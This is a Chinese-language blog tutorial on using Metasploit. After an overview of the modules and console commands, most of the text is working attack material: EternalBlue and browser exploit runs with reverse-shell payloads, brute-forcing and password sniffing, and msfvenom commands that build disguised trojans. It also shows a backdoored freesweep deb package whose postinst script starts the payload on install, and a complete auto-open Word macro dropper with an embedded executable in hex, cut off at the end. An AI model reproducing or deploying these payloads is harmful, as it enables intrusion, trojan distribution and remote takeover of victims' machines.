MSF渗透框架使用
@ 叱月 | 2021-07-02T09:40:44+08:00 | 8 分钟阅读 | 更新于 2021-07-02T09:40:44+08:00

MSF渗透工具使用

渗透工具——Metasploit Framework

一、六个模块作用

1) auxiliary模块

中文名:辅助的;备用的。

简述:此模块集成了信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能。

2) exploits模块

中文名:剥削;利用。

简述:利用已发布的系统漏洞进行攻击,此模块对应每一个具体漏洞的攻击方法(主动或被动)。

3) payloads模块

中文名:攻击载荷。

简述:使用exploits主机之后,真正在目标系统执行的代码或者指令。

  • single:这些payload是一体化的,完整的payload,不需要依赖外部的依赖库和软件包。
  • stagers:目标主机的配置低时,以传输一个小的payload用以建立连接。
  • stages:利用stagers建立的连接下载后续payload。

4) encoders模块

中文名:编码器。

简述:对payload进行加壳,实现免杀。

5) nops模块

中文名:没有。

简述:提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转执行ShellCode时,有一个较大的安全着陆区,从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败,提高渗透攻击的可靠性。

6) post模块

中文名:邮递。

简述:获取到shell之后的渗透模块,如获取敏感信息和跳板攻击等。

PS:这些模块默认存放文件夹:

/usr/shar/metasploit-framework/modules/

二、初始化介绍

1) 数据库连接命令

此命令用来管理MSF的数据库的命令,使用之前要进行初始化的操作。

msfdb init     # 初始化、启动msf数据库
msfdb reinit   # 删除、重新初始化数据
msfdb delete   # 删除、停止数据库
msfdb start    # 启动Msf数据库
msfdb stop     # 停止msf数据库
msfdb status   # 检查数据库状态信息
msfdb run      # 启动数据库和msf控制台

2) 框架的安装和使用

apt update -y
apt install metasploit-framework
service postgresql start
msfdb init
msfconsole

PS:如果启动过程之中出现错误可卸载重装

apt remove metasploit-framework
rm -rf /usr/share/metasloit-framework
apt install metasploit-framework
#最新版的Kali如果出现以下启动错误信息
<!--Unable to find a spec satisfying metasploit-framework (>= 0) in the set. Perhaps the lockfile is corrupted?
Run `bundle install` to install missing gems.
-->
#使用以下命令进行修复
gem update --system

3) 常用命令介绍

  1. help或者?:
    • 显示msfconsole可以使用的命令。help为显示一种命令的用法。
  2. show:
    • 用show命令查看msf提供的资源。在根目录下执行的话,由于有些模块资源比较多,需要执行show命令要较长的时间。
    • show exploits:查看可以使用的exploit。
    • 除了exploits,还支持all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options。有些选项需要用use使用一个模块后才能使用,比如给show targets。
  3. search:
    • 搜索模块。
    • 简单搜索:seach 选项。
    • 多条件搜索缩小范围:search name:mysql type:exploit platform:linux。
  4. use:
    • search找到模块后,用use使用模块。
    • 用use使用一个模块后,可以使用 show options查看我们需要配置的选项、使用show targets选择目标主机系统、使用show payloads选择payload、使用show advanced查看高级参数、使用show evasion查看用来做混淆、逃避的模块。
    • set/setg:
      • set ip地址、payload等。我们可以用show missing查看没有设置的参数。
      • setg是设置全局变量,避免每个模块都要输入相同的参数。
    • unset/unsetg:
      • 取消设置参数。unsetg是取消设置的全局变量。
    • save:
      • 设置的参数在下一次启动的时候不会生效,可以用save保存我们使用过程的设置。
    • check:
      • 检查目标是否真的存在这个漏洞,大部分模块没有check功能。
    • back:
      • 回到msfconsole根目录
  5. run或exploit:
    • 开始使用模块。
    • exploit -j:后台运行。
  6. sessions:
    • 查看当前已经建立的sessions,说明已经拿到了shell。
    • sessions -i id 可以进入一个session交互。
  7. load/unload:
    • 调用外部的扫描命令。
  8. loadpath:
    • 加载自己本地的模块。
  9. route:
    • 添加一条路由。比如发往某个子网的流量都通过贡献的机器发送。

三、常用模块下的工具

1) 常见漏洞

MS14_064

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本…metasploit里已经加入了此漏洞的利用模块 ,所在模块路径为:

exploit/windows/browser/ms14_064_ole_code_execution

执行流程:

msfconsole   #启动MSF
search ms14	#搜索关键字
use exploit/windows/browser/ms14_064_ole_code_execution	#加载漏洞利用模块
set AllowPowershellPrompt true #允许利用此漏洞尝试powershell
set payload windows/meterpreter/reverse_tcp #设置windows攻击载荷
exploit

获取成功截图

1

MS17_010

执行流程

search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.100.128	#扫描漏洞
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.100.128
set payload windows/x64/meterpreter/reverse_tcp
show targets	#显示目标类型
exploit

效果截图

2

2) 常见服务渗透

MSF框架可以与扫描神器Nmap结合使用,其命令的参数详情见Nmap使用手册

下面以Mysql扫描空密码为例,执行流程:

nmap -A 192.168.100.62 -oX sqomiao.xml 
#o:输出 X:文件类型为xml,在msf之中可以使用db_import命令导入文件
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set blank_passwords true
creds #查看成功渗透的记录
db_export -f xml /opt/virus/bak.xml	#导出mysql数据库空密码记录,导出的文件类型仅支持两种xml和pwdump
db_import /root/sqomiao.xml	#导入namp的扫描结果,使用hosts/serices查看导入主机的详细信息,需要注意的是,不论是导出的文件还是导入的文件所包含的不仅仅只是单一的Mysql或者某一服务的信息

效果图(由于不是空密码因此自定义设置了正确的用户和密码)

3

4

信息收集工具总结:

auxiliary/scanner/discovery/arp_sweep	#扫描局域网存活主机
auxiliary/sniffer/psnuffle
#局域网密码嗅探工具(嗅探局域网中输入的明文密码)测试:ftp连接命令lftp -u coolman 192.168.100.62 s
auxiliary/scanner/portscan/syn	#半连接的扫描
auxiliary/scanner/smb/smb_version	#基于smb协议扫描
auxiliary/scanner/smb/smb_enumshares	#smb扫描主机
auxiliary/scanner/smb/smb_lookupsid	#smb扫描全部用户(需要知道一个用户账户密码)
auxiliary/scanner/ssh/ssh_version	#ssh扫描工具,协议版本、操作系统 
auxiliary/scanner/ssh/ssh_login	
#暴力破解ssh密码,需要有字典(默认字典路径:/usr/share/metasploit-framework/data/wordlists)
auxiliary/scanner/ftp/ftp_version	#ftp收集信息,版本号
exploit/unix/ftp/vsftpd_234_backdoor	#ftp后门漏洞
auxiliary/scanner/ftp/anonymous	#ftp匿名登录的漏洞,同样ftp也可以暴力破解
auxiliary/scanner/ftp/ftp_login	#ftp暴力破解工具

四、恶意软件

1) msfvenom命令生成木马常见参数:详细参数

--platform	#指定平台

-p	#指定payload

-f	#指定所属系统下的执行文件类型linux下为elf

-b	#去除坏字符

-e	#编码方式

-i	#编码次数

-o	#输出的文件路径和名称

Windows下恶意软件生成:

msfvenom -a x64 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.100.152 LHOST=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /opt/virus/西瓜影音.exe

Linux下恶意软件生成:

msfvenom --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.152 LPORT=4444  -b "\x00" -i 10 -f elf -o /opt/virus/linux

2) deb恶意软件安装包制作:

  1. 下载已经发布的软件包解压并添加版本信息和木马程序:
apt install --download-only freesweep	#仅下载deb文件,以扫雷为例
dpkg -x freesweep_1.0.1-2_amd64.deb ./free	#解压到当前目录的free目录
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.152 LPORT=4444 -b "\x00" -i 10 -f elf -o /opt/virus/free/usr/games//freesweep_sources	
#生成木马软件包,需要注意的是在靶机进行安装时需要运行此木马
tee /opt/virus/free/DEBIAN/control << 'EOF' 
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional 
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.
EOF
#创建软件包的信息文件
tee /opt/virus/free/DEBIAN/postinst << 'EOF'
#!/bin/bash
sudo chmod 755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &	#后台运行
EOF
#安装脚本文件加载后门
dpkg-deb --build /opt/virus/free/
#重新生成安装软件包安装
msf的exploit/multi/handler启动监听	#设置linux的payload,本机主机地址LHOST,监听端口LPORT

2.目标靶机:

dpkg -i free.deb	#安装植入后门包
dpkg -r freesweep	#卸载后会话依旧存在

3) CVE-2018-8174漏洞:

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git	#获取地址
python CVE-2018-8174.py -u http://192.168.100.152/exploit.html -o hack.rtf -i 192.168.100.152 -p 4444	#生成病毒网页
mv exploit.html /var/www/html
systemctl start apache2.service

攻击方开启监听

use use exploit/multi/handler	#设置监听工具	
set lhost 192.168.100.set	#设置监听地址
payload windows/shell/reverse_tcp	#设置攻击载荷
exploit

6

靶机状态:

7

4) JRE漏洞:

jre下载链接 

use exploit/multi/browser/java_jre17_driver_manager	#设置JRE渗透工具
set payload java/meterpreter/reverse_tcp	#设置适合JRE的payload
set lhost 192.168.100.152	#设置源地址
exploit

获取到session

9

靶机画面

8

5) office宏感染word文档获取shell:

  1. 生成宏病毒
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.100.152 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe
  1. 新建word文件,新建宏且选择仅用于本文档,复制生成的内容到宏。
  Sub Auto_Open()
  	Nndzc12
  End Sub

  Sub Nndzc12()
  	Dim Nndzc7 As Integer
  	Dim Nndzc1 As String
  	Dim Nndzc2 As String
  	Dim Nndzc3 As Integer
  	Dim Nndzc4 As Paragraph
  	Dim Nndzc8 As Integer
  	Dim Nndzc9 As Boolean
  	Dim Nndzc5 As Integer
  	Dim Nndzc11 As String
  	Dim Nndzc6 As Byte
  	Dim Vgofvaolfe as String
  	Vgofvaolfe = "Vgofvaolfe"
  	Nndzc1 = "dMxkBpMK.exe"
  	Nndzc2 = Environ("USERPROFILE")
  	ChDrive (Nndzc2)
  	ChDir (Nndzc2)
  	Nndzc3 = FreeFile()
  	Open Nndzc1 For Binary As Nndzc3
  	For Each Nndzc4 in ActiveDocument.Paragraphs
  		DoEvents
  			Nndzc11 = Nndzc4.Range.Text
  		If (Nndzc9 = True) Then
  			Nndzc8 = 1
  			While (Nndzc8 < Len(Nndzc11))
  				Nndzc6 = Mid(Nndzc11,Nndzc8,4)
  				Put #Nndzc3, , Nndzc6
  				Nndzc8 = Nndzc8 + 4
  			Wend
  		ElseIf (InStr(1,Nndzc11,Vgofvaolfe) > 0 And Len(Nndzc11) > 0) Then
  			Nndzc9 = True
  		End If
  	Next
  	Close #Nndzc3
  	Nndzc13(Nndzc1)
  End Sub

  Sub Nndzc13(Nndzc10 As String)
  	Dim Nndzc7 As Integer
  	Dim Nndzc2 As String
  	Nndzc2 = Environ("USERPROFILE")
  	ChDrive (Nndzc2)
  	ChDir (Nndzc2)
  	Nndzc7 = Shell(Nndzc10, vbHide)
  End Sub

  Sub AutoOpen()
  	Auto_Open
  End Sub

  Sub Workbook_Open()
  	Auto_Open
  End Sub
  1. 复制生成的内容到word文件
Vgofvaolfe
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&HBB&HB1&HD0&H66&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HDB&HC7&HBA&H1D&H22&HFA&H31&HD9&H74&H24&HF4&H5D&H33&HC9&H66&HB9&H04&H02&H31&H55&H1A&H03&H55&H1A&H83&HC5&H19&HC0&H0F&H00&HE1&H6C&HF8&H73&HA1&H6C&H9C&H8C&H11&H09&HD5&H53&H88&H3C&H5F&HB3&HDE&H82&H50&H6D&H6A&HD9&H64&HD0&HBB&HE8&H34&H7B&H8A&HBC&H2E&H07&H02&HBC&H4C&H51&HEE&H2B&H9B&H70&HFE&H3C&H6B&HC0&HF7&H86&H25&HF1&HCA&H40&H37&H05&H10&H27&H76&H33&H39&HC8&HC4&H99&H6D&HA9&H60&H45&H4A&H5F&H09&H57&H0A&H6D&H13&HB0&HA5&H39&H56&H0B&H9D&H9F&HA6&HA4&H9D&H02&H8F&H54&HA0&HE2&HCD&HF6&H55&HFF&H5A&H9D&HE9&H41&H2A&H8A&H57&H7D&H44&H32&HD1&H6A&H32&HF5&H39&HB4&HC6&H5F&H87&HF9&HB2&HFE&HD4&HB6&HDC&H22&H91&HAF&H16&H23&HC0&H27&H4B&HCA&HD1&HAA&H3C&HC7&HAC&HEE&H9D&H4A&H20&HC3&HA2&H00&H66&HB3&H00&H75&H5B&HAA&H6C&HFF&H67&H15&H9A&HB0&H47&HFA&H89&H31&HA3&HCE&H84&HCE&H5C&HA8&HEB&HEB&HF7&HC2&H4D&H5D&H65&H78&H9B&H5D&H7A&H53&H39&H47&H82&H97&HDF&H91&H36&H74&H86&H40&H6F&H92&HCB&H03&H0D&HC2&H97&HDD&H6F&H6C&HDA&HD5&H33&H7E&H90&HE2&H39&H9B&H50&H49&H77&H70&H2C&HE3&H72&H01&H9D&H88&H11&HBD&HD2&H44&H66&H04&H43&HDE&HF0&H0A&H05&HFD&H4C&H67&H52&H06&HFE&H06&HAB&HB6&HAF&H5A&H4F&HAC&H2F&H91&HFC&H69&HE6&HD1&H96&HB1&H98&HAC&HF8&HD9&H82&HA9&H4B&H06&HC3&H61&H90&HFB&HF2&H20&H9C&H50&HB9&HFF&H52&H3B&HC9&HB2&HD1&H6A&H81&H99&HE2&H8F&H19&H09&HD2&H30&HE4&H2D&HCE&H58&H94&HE1&H14&HCC&H2D&HCE&HBB&HBD&H4D&H82&H7F&H19&HC4&H96&H24&HB7&H21&HF1&HFA&H81&HE7&HDA&H8C&H10&H37&H6E&H57&H40&H3B&HDE&H7C&H64&H3F&H06&H71&HDF&H7A&H77&HD0&H95&HDF&HA2&H91&HE3&H64&H99&HEA&HA6&H9D&H63&H91&H0D&H2C&H3C&H62&H3F&H74&HE2&H0D&HCD&HDD&H8F&H1E&H69&HF5&HBE&H72&H22&H27&H23&H60&HE8&H61&H2C&HCC&H60&H49&H62&H52&H66&HC4&H0E&HC7&HEA&H38&H4C&H8A&HC0&H07&H05&HA9&H03&H62&H10&HF8&H73&H4C&H95&H75&H5C&HB3&H4A&HA0&H2B&HF7&H8E&H57&H03&H8F&H0E&H9E&HF6&HE2&H52&HC1&H06&HCE&H9F&H3E&HCA&HF2&H25&HC4&HB3&H11&HD6&H41&H47&HD7&H8A&HE1&HA4&HA4&HCE&H63&H01&H88&HBC&H6D&HE5&HDF&H4B&H10&H0B&HB8&H27&HED&HCB&HB8&HEE&HE8&H56&HA1&HD5&HD3&H35&H6C&H53&H36&H19&H91&H4D&H5C&H81&H0A&H65&H97&HA7&H0B&H11&HE3&H50&H23&H43&H44&HAE&H37&H7A&H0F&HE9&H5A&H92&H0E&H28&H46&H60&HB0&HE8&HDF&H47&HDF&H63&H5F&H4B&HD1&HB6&H64&H82&H57&H26&H4C&H46&H61&HCA&H9B&H41&HDF&H43&H62&H22&H2E&H77&HBA&H7D&H60&H40&H02&H95&HC5&HF8&H83&H26&HB8&H4C&H0D&H61&HEC&H46&HA9&HCF&HF7&H46&H90&H52&H6A&HD3&H58&HCC&H6E&HFF&H51&H83&H84&HFA&H2E&H60&H0A&H3A&H50&HFF&H74&HFC&H61&H55&HD6&H03&HF9&HE9&H04&H46&HFE&HF8&HEB&H43&H69&H1B&H78&HE1&H4E&H9A&H16&HB9&H07&H9D&HF1&H10&H53&HB9&H52&H3D&H6C&HA7&H78&H9C&H6D&H38&H08&H56&HB4&H32&H2D&H7F&H23&HAF&H30&H82&H14&H87&HA9&H6F&H61&HC5&H17&HFB&H02&H92&H1C&H1F&H4C&HF6&HF3&H17&H49&HF9&H71&HB7&HD6&HAD&H8C&H5E&H5D&H8C&H38&HBE&H75&H52&H9A&H21&H00&HE4&H07&H5B&HA1&H0A&HB1&H57&HD3&H0A&H85&HA4&H9E&HA1&H5E&H91&H51&HCC&HAF&H16&HCE&H11&H6F&HC0&H60&HEC&H60&HE9&H2C&H97&H0B&H74&HD2&H5B&HEF&H6A&HAD&H9B&H4B&H94&HCE&HB1&H95&H45&H13&H6B&H50&HF1&H5E&HF1&H68&H5D&HE0&H5B&HC5&H67&H7E&H3D&H82&HD3&H98&HDB&HC1&H8A&H03&HE8&H27&H95&H09&H0A&HEC&H30&H55&HE9&HA9&H6B&H47&HCF&H8E&HA3&H7B&HD9&HF5&H72&HE1&H40&H12&H3E&HAD&HD4&H5F&H15&H35&H60&H24&H5B&HD4&HD8&HF6&HED&HBE&H91&H29&H20&H9C&H6E&H40&H82&HCC&H9D&H6C&H18&H5A&HC5&H14&H5F&H92&HB1&HC2&H82&HFA&H6C&H0F&H4F&HCD&HFA&H38&HC4&HB0&HD0&H02&H77&HF9&H02&HD9&H7C&HA2&H9F&H9B&H80&H0B&HE2&H6A&H81&HD6&H59&H5F&H0E&H1A&HAB&HAD&HFB&HC7&HC0&HA4&HE8&H64&H7C&H0A&H41&H05&HA1&H4E&H51&H36&H95&H68&HC7&H6F&H91&H8B&H59&H63&H1A&H36&H39&H35&H77&H95&HBA&H27&HA6&H2B&H01&H1F&H35&H43&HBD&H54&HC4&H14&HC7&H34&H33&H04&HD0&H92&H08&H56&HDD&H92&HE1&HE9&H58&HD8&H4E&H73&HE3&HF9&HA4&HF0&H72&H7A&HD2&H30&H50&HF2&H58&H10&HE5&H05&HFC&H7B&HFD&H8E&HCC&HEF&H1A&HB8&H39&H98&HD1&HA2&H25&H4C&HE8&H1E&HBC&H29&H8F&HA9&H9D&H61&HF0&H75&H21&H62&H6E&H04&H67&H0A&H35&H35&HED&HC2&H62&H25&H67&H57&H9E&HC4&HD5&H32&H66&H7C&HFA&H01&H98&H45&H7B&HB7&H06&HF9&H68&HD0&HFC&H42&HD7&HA1&H54&HA9&H6A&H74&H58&H7E&HBE&HFC&HA7&H68&H1D&H6A&HF6&HE8&H59&HDE&H20&HC2&H2E&HE1&H5E&HB4&HF7&H98&H75&H77&H91&H72&HED&HF8&HC3&H27&HD6&HF1&H00&H1C&HF6&HEE&HA6&H79&H1D&H7A&HFE&H6E&H1E&HFB&HD5&H5C&HF7&H5D&HC5&HC0&HA8&H06&HEC&HB0&H2B&H80&H89&HC0&H3F&H74&H31&H1E
&HF7&H7E&H77&H39&H0A&H5A&H17&H92&HED&H7A&H12&HA7&H53&H73&H0D&H41&H8B&H80&HEB&HD3&HBA&H81&H08&H97&HA6&HD3&H12&H4F&H4B&HDD&H5D&HF7&HD4&H8B&H4F&HC3&H96&HF1&H1B&H72&H01&HF0&H8B&H96&HAE&H5E&H94&HC7&H67&H48&H15&H2A&HA5&HBA&H66&H64&HAA&H18&HB5&HD2&H06&HE9&H5F&HC8&HC4&H7B&HD2&H65&H24&HEC&HB3&H4E&H4E&H15&HC0&H44&H89&HFD&H5D&H31&HBE&H09&HD0&H90&H7F&HFA&H0F&HE3&HBA&HC6&HD7&H0F&HFE&HEA&H5E&HB4&HC1&H70&HC2&H6E&H3E&HC9&H4A&HEB&H9D&H5E&H44&H9B&H8E&HBE&H7C&H9F&H54&H2B&H65&HA1&HBA&HAB&HE4&H19&H7D&HDD&HFE&HB6&HAF&H2C&H41&HFE&HAF&HE4&H50&H0A&HEE&H00&H84&HE8&H8A&H87&HC2&H5B&HFD&HAF&H5C&H7F&H4A&H78&HEE&HCE&HEF&H63&H6A&H08&H6C&H2D&HF9&H5B&H38&HF8&H81&H33&H4B&H19&H42&H05&HEF&H98&HAA&H65&H2E&H2C&H31&HAB&HEC&H4E&HE9&HF8&HD9&H50&H0D&HC0&H2B&H38&HF1&H52&HFA&H46&HF4&HD8&HD4&HD9&HAA&H4C&HE0&H08&H8B&H31&HB8&HBE&HAE&HAB&H02&H68&H1C&H16&HC0&HA1&H35&HFD&H4C&HEF&H2E&H48&H5C&H92&H45&H6E&H30&HC3&H82&H2D&H27&HBF&H8D&HB0&H9E&HF9&H2A&HA2&HDB&H3A&HF2&HC5&H66&H87&HA3&HD4&H3D&HAD&H09&H23&H56&HDB&H07&H65&H64&HDF&H85&H0B&HDE&H61&H77&H3E&H75&HDB&H91&HFE&HC2&H50&H6C&HC7&H7C&HE0&HBA&H95&HBF&HF8&H7F&H67&HBB&H6C&H40&H38&H88&H05&H2B&HE3&H0E&HE3&H32&HF1&HAB&H66&H93&H58&HF9&H92&HC8&HFE&H76&HD6&HEB&H63&HFE&HB0&H75&HD5&H76&H4D&HB6&H96&H01&HB6&H72&HDF&H41&H45&HF3&H4B&H9E&H12&H51&H93&HA5&H82&H51&H3B&H9C&HF9&HA1&H4C&HF7&HE8&HE1&HE6&H37&H12&HC5&HAE&HF6&HED&H0A&HAA&HE4&HE6&H17&H7E&HAB&H67&HFE&H00&HF3&H36&H3E&H45&H67&HD8&H87&HD3&HFC&H12&H0C&HED&HB5&H07&H1E&HDF&H55&HFE&H34&H23&H42&H4E&HF9&HC8&H94&H63&H8F&HB8&H89&H29&H46&HE6&HCA&HAD&HA3&HE0&HBC&HEF&H7F&HEC&H1E&H21&H05&HA4&H91&H39&H94&HF9&H7B&H39&HA6&H70&H9C&HCF&HAA&H04&HAD&H5C&H47&HB3&H30&H8D&H48&H5C&HA0&H00&H05&H44&H81&H3A&HE4&H1F&H1D&H81&HF9&HBF&H12&HF8&H18&HE5&H05&HF2&HE6&H01&HB1&HC3&H11&H3E&HE2&H19&HBC&H72&H8B&H79&HA6&HE6&HC0&HC7&HD4&HAA&HDF&H63&HF4&H95&H65&HF6&H30&H9B&HBB&HE7&H02&H68&H0F&HB0&H2B&H6F&H7A&H61&H23&H1E&HB6&H24&HCF&H61&H82&H27&H84&H72&HD5&H21&H1E&HB6&HCC&HDA&HB0&H21&HA0&H56&H24&HCC&HDB&HC6&H0D&HA5&HDF&H4E&H64&HE6&HFE&H08&HE3&H4A&HCA&H47&HF9&H52&H5F&H09&HEA&H57&HA3&H60&HD9&HF8&H3B&H87&HAD&H6A&H3D&H44&H8D&H42&H0A&H8D&H00&HA2&H47&H18&HF4&H5B&H03&H18&H4F&HFD&H7D&HF4&HB9&HC5&HDA&H2E&H47&H8B&H7B&HB6&HCF&HF2&H6A&HEC&H36&H17&H09&HE8&HA4&HB5&HE2&HDC&H5F&HAE&HF4&HB1&HE6&H47&HDE&HEB&H97&H7A&H26&H9F&HDD&H49&H40&H98&H67&HC3&HCB&H88&HC8&H9A&HE0&H8A&HD5&H34&HCA&HA3&HC3&H89&HCC&H61&H9D&HC2&H6C&HDD&H15&HAF&HBD&HF0&HB2&H74&H38&H64&H73&H5A&H17&HE9&H4D&H1B&H78&HC9&H8C&H28&H92&H89&H65&H2D&H8C&H7F&HC7&HA5&H6C&H17&H59&HAE&H40&H1E&HC5&H99&H6D&HF6&H1F&H50&H9C&HE7&H10&HCE&H65&HC7&H72&H70&H3A&HDE&H97&H92&H09&HED&H6A&H58&HF8&HF8&H8F&H6F&H1C&H0E&HFE&H6F&H83&H89&H11&HEB&H6B&HA5&HC1&HE4&H1A&HAA&H20&H1A&H8F&H96&HFA&H74&H21&HC1&HCD&H08&H82&HF0&H1A&H2E&HB2&H86&HDD&H17&H11&H7C&H5F&HC9&H5E&H94&H69&H21&H0D&H74&H9E&HCC&H55&HB2&H06&HD9&H76&HF5&H3B&HCA&H52&HFB&HC2&H1A&H14&H08&HB7&H2E&HEA&HD0&H64&H16&H29&H7D&HA5&H69&H99&H90&HFA&HF3&H7C&HFF&HF9&H64&H0F&H7F&HE0&HBF&H91&HDA&H11&HF9&HC5&H70&H1B&HE1&H56&H18&H2B&H13&HE3&H50&H09&H99&H7B&H63&H83&H3B&H8D&HBD&H4F&H